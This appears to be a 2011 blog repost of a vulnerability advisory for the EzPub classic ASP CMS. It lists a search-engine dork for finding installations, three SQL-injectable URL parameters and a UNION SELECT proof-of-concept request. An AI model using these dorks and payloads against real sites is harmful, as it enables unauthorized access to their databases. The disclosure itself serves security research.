EzPub - Simple Classic ASP CMS Vulnerable to SQL Injection ~ Random stuff by yappare

Tuesday, March 8, 2011

EzPub - Simple Classic ASP CMS Vulnerable to SQL Injection

on March 08, 2011 No comments

Title : EzPub - Simple Classic ASP CMS Vulnerable to SQL Injection
Web : http://www.soft4web.ro
Found by: p0pc0rn 08/03/2011
Dork : intext:"Powered by EZPub"

SQL - Microsoft JET Database Engine error
------------------------------------------

http://site.com/view_article.asp?item=[SQL]
http://site.com/page.asp?pID=[SQL]
http://site.com/display.asp?sortby=sections&sID=[SQL]

POC
---

http://site.com/view_article.asp?item=1 union select 1 from test.a

thanks,
-p0pc0rn-

Random stuff by yappare

Tuesday, March 8, 2011

EzPub - Simple Classic ASP CMS Vulnerable to SQL Injection

0 comments:

Text Widget

Popular Posts

Pages

Blog Archive

Recent Posts

Unordered List

Categories